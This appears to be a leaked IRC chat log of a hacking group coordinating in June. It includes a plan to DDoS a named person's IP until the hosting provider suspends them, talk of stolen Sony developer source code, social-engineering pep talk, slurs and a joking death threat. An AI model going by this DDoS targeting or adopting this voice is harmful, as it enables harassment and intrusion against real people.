        <w:t>Jun 02 17:55:45 * Neuron (Neuron@HA-96p.col.tt2aeb.IP) has joined #pure- elite Jun 02 17:56:56 * Neuron has quit (Quit: leaving) Jun 02 17:58:12 * Neuron (Neuron@HA-c7g.ftg.j06iiv.IP) has joined #pure- elite Jun 02 17:58:34 * Topiary has quit (Ping timeout: 121 seconds) Jun 02 18:00:07 neuron Need someone to op me Jun 02 18:00:16 joepie91 [01:58:59] fed | so, I want to play with you guys and this channel is like, gayer Jun 02 18:00:16 joepie91 than gay and full of newfags Jun 02 18:00:16 joepie91 [01:59:11] fed | wheres the real #lulzsec Jun 02 18:00:16 joepie91 [01:59:18] YouAreAPirate | Play in what sense? Jun 02 18:00:16 joepie91 [01:59:48] fed | you now what I mean Jun 02 18:00:16 joepie91 [01:59:55] egeste | know* Jun 02 18:00:18 neuron trollpoll: Topiary Jun 02 18:00:18 storm nick?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:00:20 neuron someone op Jun 02 18:00:21 joepie91 who wants to talk Jun 02 18:00:24 joepie91 also Jun 02 18:00:24 * pwnsauce gives channel operator status to Neuron Jun 02 18:00:28 pwnsauce haOpped Jun 02 18:00:28 trollpoll yep Jun 02 18:00:32 neuron CaptianJack Jun 02 18:00:34 joepie91 ok Jun 02 18:00:45 trollpoll i've no op Jun 02 18:00:48 joepie91 CaptainJack Jun 02 18:00:50 joepie91 on 2600 Jun 02 18:00:51 joepie91 is yo Jun 02 18:00:51 storm CaptianJack: No such nick/channel Jun 02 18:00:52 trollpoll and i dont want it Jun 02 18:00:53 joepie91 you* Jun 02 18:00:54 joepie91 right?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:01:20 neuron CaptainJack Jun 02 18:01:23 Recursion it took just about 1 hours to hit AP Jun 02 18:01:32 storm we have like Jun 02 18:01:33 storm dude Jun 02 18:01:35 Recursion hour, rather.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:01:36 storm more ppl in one room Jun 02 18:01:41 storm than this whole server had Jun 02 18:01:42 storm has* Jun 02 18:02:01 joepie91 Neuron Jun 02 18:02:04 joepie91 his name is egest Jun 02 18:02:06 joepie91 egeste* Jun 02 18:02:09 joepie91 he says you are not responding Jun 02 18:02:20 joepie91 [02:00:21] egeste | I know you guys don't know me, but you probably know people that do Jun 02 18:02:20 joepie91 [02:00:46] egeste | Xero, venuism, e, insidious, nigg, etc etc Jun 02 18:02:20 joepie91 [02:00:57] egeste | kayla Jun 02 18:02:40 trollpoll these nicks are very well known Jun 02 18:02:52 neuron haha Jun 02 18:03:10 sabu hes just name dropping Jun 02 18:03:11 neuron tell him to provide a 0day as proff and he can join Jun 02 18:03:12 neuron then ban him Jun 02 18:03:17 sabu kayla says that kid used to idle in gnosis Jun 02 18:03:19 sabu and not do shit Jun 02 18:03:38 joepie91 you talk to him Jun 02 18:03:39 joepie91 lol Jun 02 18:03:41 sabu guys get your social engineering games up Jun 02 18:03:44 sabu cause im starting to see some fails Jun 02 18:04:03 sabu is topiary on irc?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:04:07 sabu fuck Jun 02 18:04:09 joepie91 also, yes, I am talking differently on my alternate nick.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:04:59 Recursion Sabu: I'm not even saying a word, bud.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:03 Recursion just observing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:22 storm wow Jun 02 18:05:23 storm bro Jun 02 18:05:28 neuron ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:29 storm people are trying to down our ops Jun 02 18:05:35 joepie91 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:36 neuron ya think :P Jun 02 18:05:38 storm i just put my v6 client up Jun 02 18:05:44 storm v00d00 Jun 02 18:06:02 sabu 13:56:30.729325 IP smpp.uk.access.vodafone.net &gt; vps5890.lulz.net: ICMP echo request, id 30064, seq 4, length 64 Jun 02 18:06:02 sabu 13:56:30.729360 IP vps5890.lulz.net &gt; smpp.uk.access.vodafone.net: ICMP echo reply, id 30064, seq 4, length 64 Jun 02 18:06:03 Recursion inbeforebotnetjoins Jun 02 18:06:07 sabu someone from vodaphones pinging us Jun 02 18:06:14 joepie91 lol Jun 02 18:06:15 sabu 13:56:50.228857 IP 64-46-16- 105.dyn.novuscom.net.isakmp &gt; vps5890.lulz.net.isakmp: isakmp: phase 1 I #243 Jun 02 18:06:15 sabu 13:56:50.228886 IP vps5890.lulz.net &gt; 64-46-16- 105.dyn.novuscom.net: ICMP vps5890.lulz.net udp port isakmp unreachable, length 376 Jun 02 18:06:20 sabu people scanning us Jun 02 18:06:22 sabu lol Jun 02 18:06:23 neuron yeah im getting hit Jun 02 18:06:26 sabu im watcinhg tcpdump hard Jun 02 18:06:27 neuron scan my vm?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:06:32 joepie91 I am not getting hit it seems Jun 02 18:06:33 joepie91 odd Jun 02 18:06:33 trollpoll in other way of things, do you really think that tor is compromised? i mean, i know that many tor servers are CIA servers, but this doesnt mean nothing... except a mitm... but they had to know who is gonna connect before connect... or do a mitm to everyone...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:06:33 storm no scanning Jun 02 18:06:39 storm open up tcpdump Jun 02 18:06:41 storm and do Jun 02 18:06:43 storm -i eth0 Jun 02 18:06:50 joepie91 or maybe I am.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:06:56 sabu tor is not trustable Jun 02 18:07:05 sabu please dont use for anything other than random site visitng Jun 02 18:07:07 joepie91 is it bad my host is so shitty I can't tell whether I am getting hit? :/ Jun 02 18:07:09 trollpoll just because the rsa affair?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:07:12 Recursion we gotta get off that server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:07:18 neuron were getting hit Jun 02 18:07:24 Recursion the IRC server Jun 02 18:07:25 sabu neuron Jun 02 18:07:27 sabu so sign off?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:07:29 sabu look Jun 02 18:07:31 storm Sabu Jun 02 18:07:31 sabu guys Jun 02 18:07:34 neuron lol i just hopped onto another ip Jun 02 18:07:35 sabu neuron Jun 02 18:07:37 * Topiary (t@HA-s05.rkn.75e5ku.IP) has joined #pure-elite Jun 02 18:07:39 storm I use tor to connect to my ddos boxen Jun 02 18:07:40 sabu recursion etc Jun 02 18:07:40 storm ;x Jun 02 18:07:46 Recursion yup yup Jun 02 18:08:06 sabu if youre going to be in there its for research purposes Jun 02 18:08:13 joepie91 not getting hit here :/ Jun 02 18:09:04 trollpoll Sabu, im using tor right now...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:09:04 joepie91 ohey Jun 02 18:09:08 joepie91 Ryan is on 2600 Jun 02 18:09:09 storm te whole room is hit Jun 02 18:09:13 storm the* Jun 02 18:09:17 storm hes hitting random ppl Jun 02 18:09:22 joepie91 ~b@vps.anon.su Jun 02 18:09:23 joepie91 [02:07:22] xxxx | hi kayla or sabu or tflow Jun 02 18:09:25 joepie91 Ryan Jun 02 18:09:28 neuron lul Jun 02 18:09:30 Recursion I'm out of there Jun 02 18:09:40 storm why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:09:41 storm lol Jun 02 18:09:44 storm it's funny Jun 02 18:09:44 storm xD Jun 02 18:09:51 storm set up ipv6 Jun 02 18:09:51 joepie91 what should I say to Ryan?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:09:56 storm they obviously cant hit it Jun 02 18:09:56 Topiary &lt;laurelai&gt; nicely done Jun 02 18:10:01 storm 22:09 &lt;xxxx&gt; hi kayla or sabu Jun 02 18:10:06 storm he pmed me Jun 02 18:10:07 storm rofl Jun 02 18:10:08 neuron lul Jun 02 18:10:13 neuron same Jun 02 18:10:14 Topiary [Laurelai] (~Laurelai@205.185.113.6): Laurela Jun 02 18:10:18 joepie91 lol Jun 02 18:10:18 Topiary Laurelai leaked our logs Jun 02 18:10:19 neuron gonna say im awinee Jun 02 18:10:19 Topiary storm Jun 02 18:10:38 joepie91 uh Jun 02 18:10:40 joepie91 Topiary Jun 02 18:10:40 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:10:43 joepie91 that is a Frantech IP Jun 02 18:10:48 Topiary FIREFIREFIREFIRE Jun 02 18:10:52 Topiary FUCK YOU FRANTECH\111 Jun 02 18:10:52 joepie91 DDoS it Jun 02 18:10:54 sabu everybody stfu Jun 02 18:10:54 joepie91 it will disappear Jun 02 18:10:55 storm ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:10:56 joepie91 in a few minutes Jun 02 18:10:56 sabu EVERYONE Jun 02 18:10:57 sabu STFU Jun 02 18:11:02 sabu relax Jun 02 18:11:06 sabu as for ryan Jun 02 18:11:13 sabu ignore him Jun 02 18:11:16 sabu he doesnt know its us Jun 02 18:11:18 sabu jesus Jun 02 18:11:27 joepie91 relax :P Jun 02 18:11:30 trollpoll i left 2600...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:11:36 Topiary Ryan huh?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:11:36 sabu ok.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:11:39 storm you guys are ridiculous xD Jun 02 18:11:43 trollpoll the situation is getting horrible stressing Jun 02 18:11:43 sabu I know jesus Jun 02 18:11:46 sabu look Jun 02 18:11:49 sabu from now on Jun 02 18:12:05 sabu no one goes on 2600 unless you prep yourselfl for the social engineering Jun 02 18:12:11 sabu if you dont know how to social engineer do not get on 2600 Jun 02 18:12:17 sabu if you do not have a ddos protected ip Jun 02 18:12:20 sabu do not get on 2600 Jun 02 18:12:23 sabu thats it Jun 02 18:12:28 storm Jun 02 18:12:29 neuron Aye Jun 02 18:12:30 storm exactly it Jun 02 18:12:32 storm and Jun 02 18:12:34 storm for starters Jun 02 18:12:35 joepie91 it's not ddos protected, but disposable nevertheless :P Jun 02 18:12:40 storm ill give anyone an ipv6 shell Jun 02 18:12:42 storm straight up Jun 02 18:12:42 Recursion aye-aye, storm Jun 02 18:12:46 storm cause i love you guys Jun 02 18:12:46 Recursion err Jun 02 18:12:47 storm :D Jun 02 18:12:47 Recursion Sabu: Jun 02 18:12:51 trollpoll hahaha Jun 02 18:12:54 sabu yes Jun 02 18:13:07 Recursion I meant to say, aye-aye Sabu , not storm Jun 02 18:13:09 Recursion muhbad.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:13:11 sabu ok Jun 02 18:13:11 storm lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:13:18 sabu sony was leaked Jun 02 18:13:22 sabu we got bigger projects Jun 02 18:13:37 sabu atm neuron has access to source code to scedev.net socny dev team Jun 02 18:13:38 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-elite Jun 02 18:13:41 sabu how about those who are not busy Jun 02 18:13:42 joepie91 Topiary: just a tip, Frantech has an automated nullrouting system in place. If you DDoS Laurelais IP, he will disappear from the internet for a while, and if you keep doing it he will be booted from their service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:13:49 sabu work on auditing that src Jun 02 18:14:02 Topiary I'm off to bed in a few Jun 02 18:14:04 sabu storm, hear that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:14:08 sabu drop that ip Jun 02 18:14:08 storm sup?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:14:10 neuron Im on it currently talking to more people Jun 02 18:14:15 sabu Topiary [Laurelai] (~Laurelai@205.185.113.6): Laurela Jun 02 18:14:20 storm ok gimme a few Jun 02 18:14:22 storm rebooting Jun 02 18:14:22 sabu kk Jun 02 18:14:24 sabu now Jun 02 18:14:25 Topiary Laurelai was the one who compromised our HBGay logs Jun 02 18:14:29 Topiary so yes Jun 02 18:14:29 storm im on doze Jun 02 18:14:31 joepie91 it'll get nullrouted for ~1 hour at first I believe Jun 02 18:14:36 joepie91 after a few nullroutes he will get suspended Jun 02 18:14:37 joepie91 :) Jun 02 18:14:44 storm rebooting now Jun 02 18:15:32 &lt;palladium&gt; Hi everyone!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:15:46 neuron 0-0 o/ Jun 02 18:16:00 neuron HI! who are you and whats your posion?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:16:46 neuron For funzies Topiary: we have a IAMA request on reddit if your intrested Jun 02 18:16:58 joepie91 - CrazyD quit (Quit: Sure is #ifeds) Jun 02 18:17:00 joepie91 lolwut Jun 02 18:17:08 Topiary what's that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:17:19 Topiary @ Neuron Jun 02 18:17:24 neuron a IAMA Jun 02 18:17:31 neuron basically a Qand A session on reddit Jun 02 18:17:39 neuron were redditors ask questions an you answer Jun 02 18:18:00 sabu wait Jun 02 18:18:06 sabu you guys started a iama on reddit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:18:49 Recursion ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:19:00 sabu I will go to your homes and kill you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:19:10 storm yo Jun 02 18:19:13 Recursion Neuron: are you serious?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:19:17 sabu if you really started an iama bro Jun 02 18:19:24 sabu you really dont understand what we are about here Jun 02 18:19:51 kl0ps ok guys, i have to go to bed. see you tomorrow. btw lulzsec is so funny :D ... love ya Jun 02 18:19:54 kl0ps gn8 Jun 02 18:20:03 storm night Jun 02 18:20:06 sabu goodnight kl0ps Jun 02 18:20:06 Recursion g'night Jun 02 18:20:14 Recursion Neuron Jun 02 18:20:15 * kl0ps has quit (Quit: Leaving) Jun 02 18:20:17 Recursion ffs Jun 02 18:20:50 sabu I dont see it Jun 02 18:21:08 trollpoll Sabu, mmm, what do you think about doing some "tutorials" on how to act, how to protect ourselves, etc...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:21:16 trollpoll something quick and dirty Jun 02 18:21:43 sabu I think so Jun 02 18:21:44 Topiary let's not do a Q&amp;A with Reddit Jun 02 18:21:57 sabu I thought all this stuff was common knowledge Jun 02 18:22:04 Recursion we shouldn't interface with the public any more than we have to Jun 02 18:22:12 Topiary twitter is enough Jun 02 18:22:21 Topiary our formspring was dumb so I stopped answering questions weeks ago Jun 02 18:22:23 Recursion indeed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:22:32 storm Sabu Jun 02 18:22:40 storm I have to leave can you keep that IP for later? Jun 02 18:22:42 * Sabu has changed the topic to: pE | NO LEAKS | NO MEDIA | Talk to Sabu OR Topiary if unsure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:22:48 sabu yup save it for later Jun 02 18:22:51 storm OK Jun 02 18:22:53 storm good game.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:22:55 sabu muah Jun 02 18:23:03 storm I gotta go to that thing we talk about from time to time Jun 02 18:23:04 storm ;) Jun 02 18:23:07 storm I'll be back Jun 02 18:23:10 joepie91 fap?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:14 storm text me if shit gets knocked you feel me?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:15 storm na Jun 02 18:23:15 trollpoll sure fap Jun 02 18:23:15 joepie91 :P Jun 02 18:23:25 storm btw Jun 02 18:23:31 storm people are dropping the ipv6 server Jun 02 18:23:31 joepie91 fap. always fap.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:37 storm they want us to be opless.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:45 joepie91 friend of mine just dropped too Jun 02 18:23:52 trollpoll perhaps is not a bad idea to leave 2600 ... Jun 02 18:23:58 storm perhaps Jun 02 18:24:00 Recursion as I said Jun 02 18:24:00 Topiary yeah let's chill somewhere else Jun 02 18:24:01 storm because for one Jun 02 18:24:03 Topiary everyone wanna leave?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:24:04 joepie91 strangely I dont ping out yet Jun 02 18:24:06 trollpoll feds will start searching ips of random users Jun 02 18:24:08 storm I'm not going to drop a ton of users Jun 02 18:24:09 Recursion dont interface with the public more than you need to Jun 02 18:24:17 storm to priotect a shit channel on shitty servers Jun 02 18:24:20 storm protect even Jun 02 18:24:21 storm although Jun 02 18:24:22 sabu look Jun 02 18:24:26 storm having a fanbase is fun Jun 02 18:24:30 sabu close channel Jun 02 18:24:33 sabu first Jun 02 18:24:36 sabu mod channel Jun 02 18:24:37 sabu +m Jun 02 18:24:49 storm done Jun 02 18:24:50 sabu let everyone know 2600 irc was temporary for meeting fans or whatever Jun 02 18:24:51 storm now what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:24:52 sabu see us on twitter Jun 02 18:24:58 sabu and just close the chan down Jun 02 18:25:04 sabu throw a crackhead bot in there and keep it moving Jun 02 18:25:08 neuron rgr Jun 02 18:25:14 sabu neuron let storm do it Jun 02 18:25:16 Recursion Neuron: did you start an AMA?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:25:16 joepie91 I think a server just died Jun 02 18:25:41 Topiary now we all leave Jun 02 18:25:43 Topiary everyone /part Jun 02 18:25:51 sabu yeah Jun 02 18:25:53 trollpoll thats it Jun 02 18:25:57 sabu no more public apperances Jun 02 18:26:00 sabu witohut us organizing it Jun 02 18:26:03 neuron left Jun 02 18:26:05 sabu thanks storm for holding it down Jun 02 18:26:05 trollpoll great Jun 02 18:26:13 sabu guys from now on Jun 02 18:26:22 storm done Jun 02 18:26:23 sabu if you are not familiar with these hostile environments Jun 02 18:26:25 neuron Few seocnds Jun 02 18:26:35 sabu don't partake in it Jun 02 18:26:38 storm SignOff hentrax: #lulzsec (Ping timeout: 240 seconds) Jun 02 18:26:38 storm SignOff home_keys: #lulzsec (Quit: Leaving) Jun 02 18:26:38 storm SignOff haraldo: #lulzsec (Quit: Leaving.) Jun 02 18:26:38 storm fancypants is now known as lessthanthree Jun 02 18:26:38 storm happyhour [~hehe@124-148-131-129.dyn.iinet.net.au] has joined #lulzsec Jun 02 18:26:38 storm SignOff Anonique88: #lulzsec () Jun 02 18:26:38 storm BlizWar [~kruppa@a88-112-133-232.elisa- laajakaista.fi] has left #lulzsec Jun 02 18:26:38 storm [] Jun 02 18:26:38 storm SignOff SL1CHAOS: #lulzsec () Jun 02 18:26:38 storm SignOff [KGB]Derungo: #lulzsec () Jun 02 18:26:39 storm rofl Jun 02 18:26:44 storm right after topic change Jun 02 18:26:55 neuron bwhaha Jun 02 18:26:58 storm and yeah guys Jun 02 18:26:59 storm btw Jun 02 18:27:03 sabu yeah bro?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
